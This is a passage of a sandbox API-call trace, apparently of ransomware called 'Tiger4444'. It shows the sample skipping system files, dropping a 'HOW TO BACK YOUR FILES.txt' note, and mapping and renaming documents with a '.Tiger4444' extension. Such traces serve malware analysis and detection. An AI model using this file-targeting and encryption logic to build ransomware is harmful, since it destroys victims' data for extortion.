lstrcmpiW (lpString1="UQBqZ", lpString2="pagefile.sys") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="boot") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="ids.txt") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="NTUSER.DAT") returned 1 [0047.133] lstrcpyW (in: lpString1=0x30aeb20, lpString2="UQBqZ" | out: lpString1="UQBqZ") returned="UQBqZ" [0047.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0047.133] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x84) returned 0xc790d8 [0047.133] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663a8 | out: ListHead=0xc66828, ListEntry=0xc663a8) returned 0xc666a8 [0047.133] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b035e70, ftCreationTime.dwHighDateTime=0x1d4d137, ftLastAccessTime.dwLowDateTime=0x5b788690, ftLastAccessTime.dwHighDateTime=0x1d4c691, ftLastWriteTime.dwLowDateTime=0x5b788690, ftLastWriteTime.dwHighDateTime=0x1d4c691, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UQBqZ", cAlternateFileName="")) returned 0 [0047.133] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0047.133] lstrcpyW (in: lpString1=0x30aeb20, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.133] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.134] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.134] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.134] CloseHandle (hObject=0x260) returned 1 [0047.134] CloseHandle (hObject=0x2ac) returned 1 [0047.134] GetCurrentThreadId () returned 0xfa8 [0047.134] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0047.134] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ" [0047.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc790d8 | out: hHeap=0xc50000) returned 1 [0047.134] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0047.134] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ" [0047.134] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\" [0047.134] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\.BFC0E91B00AE8A0620D3" [0047.134] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.140] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.142] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.143] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.143] CloseHandle (hObject=0x2ac) returned 1 [0047.143] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ") returned 65 [0047.143] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.143] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b035e70, ftCreationTime.dwHighDateTime=0x1d4d137, ftLastAccessTime.dwLowDateTime=0x5b788690, ftLastAccessTime.dwHighDateTime=0x1d4c691, ftLastWriteTime.dwLowDateTime=0x811e5f80, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0047.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.144] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.144] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.144] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.144] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b035e70, ftCreationTime.dwHighDateTime=0x1d4d137, ftLastAccessTime.dwLowDateTime=0x5b788690, ftLastAccessTime.dwHighDateTime=0x1d4c691, ftLastWriteTime.dwLowDateTime=0x811e5f80, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.144] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.144] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.144] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.144] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.144] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.144] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x811bfd26, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x811bfd26, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x811e5f80, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.144] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.144] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.144] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x642f9360, ftCreationTime.dwHighDateTime=0x1d4c852, ftLastAccessTime.dwLowDateTime=0xb2067a70, ftLastAccessTime.dwHighDateTime=0x1d4cd4a, ftLastWriteTime.dwLowDateTime=0xb2067a70, ftLastWriteTime.dwHighDateTime=0x1d4cd4a, nFileSizeHigh=0x0, nFileSizeLow=0x8b53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n-412MXR6-L.pdf", cAlternateFileName="N-412M~1.PDF")) returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="Tiger4444.exe") returned -1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2=".") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="..") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="windows") returned -1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="bootmgr") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="pagefile.sys") returned -1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="boot") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="ids.txt") returned 1 [0047.144] lstrcmpiW (lpString1="n-412MXR6-L.pdf", lpString2="NTUSER.DAT") returned -1 [0047.144] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="n-412MXR6-L.pdf" | out: lpString1="n-412MXR6-L.pdf") returned="n-412MXR6-L.pdf" [0047.144] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\n-412MXR6-L.pdf", dwFileAttributes=0x0) returned 1 [0047.144] lstrlenW (lpString="n-412MXR6-L.pdf") returned 15 [0047.144] lstrlenW (lpString="Tiger4444") returned 9 [0047.144] lstrcmpiW (lpString1="XR6-L.pdf", lpString2="Tiger4444") returned 1 [0047.145] lstrlenW (lpString=".dll") returned 4 [0047.145] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.145] lstrlenW (lpString=".lnk") returned 4 [0047.145] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0047.145] lstrlenW (lpString=".ini") returned 4 [0047.145] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0047.145] lstrlenW (lpString=".sys") returned 4 [0047.145] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0047.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\n-412MXR6-L.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\n-412mxr6-l.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.145] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.145] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13859797798) returned 1 [0047.145] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=35667) returned 1 [0047.145] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0047.145] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0047.145] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e60, lpName=0x0) returned 0x2c8 [0047.145] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e60) returned 0xbe0000 [0047.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0047.146] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0047.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.146] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13859950575) returned 1 [0047.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0047.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0047.146] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.147] CloseHandle (hObject=0x2c8) returned 1 [0047.147] CloseHandle (hObject=0x260) returned 1 [0047.147] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\n-412MXR6-L.pdf.Tiger4444") returned 91 [0047.147] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\n-412MXR6-L.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\n-412mxr6-l.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\n-412MXR6-L.pdf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\n-412mxr6-l.pdf.tiger4444"), dwFlags=0x1) returned 1 [0047.148] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=35680 | out: Addend=0xc6f980) returned 22212992 [0047.148] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4850 [0047.148] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb622fff0, ftCreationTime.dwHighDateTime=0x1d4d05d, ftLastAccessTime.dwLowDateTime=0x35c3d20, ftLastAccessTime.dwHighDateTime=0x1d4cfd4, ftLastWriteTime.dwLowDateTime=0x35c3d20, ftLastWriteTime.dwHighDateTime=0x1d4cfd4, nFileSizeHigh=0x0, nFileSizeLow=0xb6ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oCaEFK.pps", cAlternateFileName="")) returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="Tiger4444.exe") returned -1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2=".") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="..") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="windows") returned -1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="bootmgr") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="pagefile.sys") returned -1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="boot") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="ids.txt") returned 1 [0047.148] lstrcmpiW (lpString1="oCaEFK.pps", lpString2="NTUSER.DAT") returned 1 [0047.148] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="oCaEFK.pps" | out: lpString1="oCaEFK.pps") returned="oCaEFK.pps" [0047.148] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\oCaEFK.pps", dwFileAttributes=0x0) returned 1 [0047.148] lstrlenW (lpString="oCaEFK.pps") returned 10 [0047.148] lstrlenW (lpString="Tiger4444") returned 9 [0047.148] lstrcmpiW (lpString1="CaEFK.pps", lpString2="Tiger4444") returned -1 [0047.148] lstrlenW (lpString=".dll") returned 4 [0047.148] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0047.148] lstrlenW (lpString=".lnk") returned 4 [0047.148] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0047.149] lstrlenW (lpString=".ini") returned 4 [0047.149] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0047.149] lstrlenW (lpString=".sys") returned 4 [0047.149] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0047.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\oCaEFK.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\ocaefk.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.149] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.149] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13860189099) returned 1 [0047.149] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=46828) returned 1 [0047.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0047.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0047.149] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb9f0, lpName=0x0) returned 0x2c8 [0047.149] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb9f0) returned 0xbe0000 [0047.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0047.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0047.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0047.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0047.150] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13860353832) returned 1 [0047.150] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0047.151] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0047.151] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.151] CloseHandle (hObject=0x2c8) returned 1 [0047.151] CloseHandle (hObject=0x260) returned 1 [0047.152] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\oCaEFK.pps.Tiger4444") returned 86 [0047.152] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\oCaEFK.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\ocaefk.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\oCaEFK.pps.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\ocaefk.pps.tiger4444"), dwFlags=0x1) returned 1 [0047.152] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=46832 | out: Addend=0xc6f980) returned 22248672 [0047.152] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4851 [0047.152] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833ef860, ftCreationTime.dwHighDateTime=0x1d4cdaf, ftLastAccessTime.dwLowDateTime=0xa1a4e550, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0xa1a4e550, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x10399, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xEqwtSKV7zLSf.pps", cAlternateFileName="XEQWTS~1.PPS")) returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="Tiger4444.exe") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2=".") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="..") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="windows") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="bootmgr") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="pagefile.sys") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="boot") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="ids.txt") returned 1 [0047.152] lstrcmpiW (lpString1="xEqwtSKV7zLSf.pps", lpString2="NTUSER.DAT") returned 1 [0047.152] lstrcpyW (in: lpString1=0x30aeb2c, lpString2="xEqwtSKV7zLSf.pps" | out: lpString1="xEqwtSKV7zLSf.pps") returned="xEqwtSKV7zLSf.pps" [0047.152] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\xEqwtSKV7zLSf.pps", dwFileAttributes=0x0) returned 1 [0047.153] lstrlenW (lpString="xEqwtSKV7zLSf.pps") returned 17 [0047.153] lstrlenW (lpString="Tiger4444") returned 9 [0047.153] lstrcmpiW (lpString1="7zLSf.pps", lpString2="Tiger4444") returned -1 [0047.153] lstrlenW (lpString=".dll") returned 4 [0047.153] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0047.153] lstrlenW (lpString=".lnk") returned 4 [0047.153] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0047.153] lstrlenW (lpString=".ini") returned 4 [0047.153] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0047.153] lstrlenW (lpString=".sys") returned 4 [0047.153] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0047.153] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\UQBqZ\\xEqwtSKV7zLSf.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\uqbqz\\xeqwtskv7zlsf.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.153] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.153] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13860612796) returned 1 [0047.153] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=66457) returned 1 [0047.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0047.153] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0047.153] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x106a0, lpName=0x0) returned 0x2c8 [0047.153] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106a0) returned 0xbe0000 [0047.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0047.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0047.155] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13860820848) returned 1 [0047.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0047.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 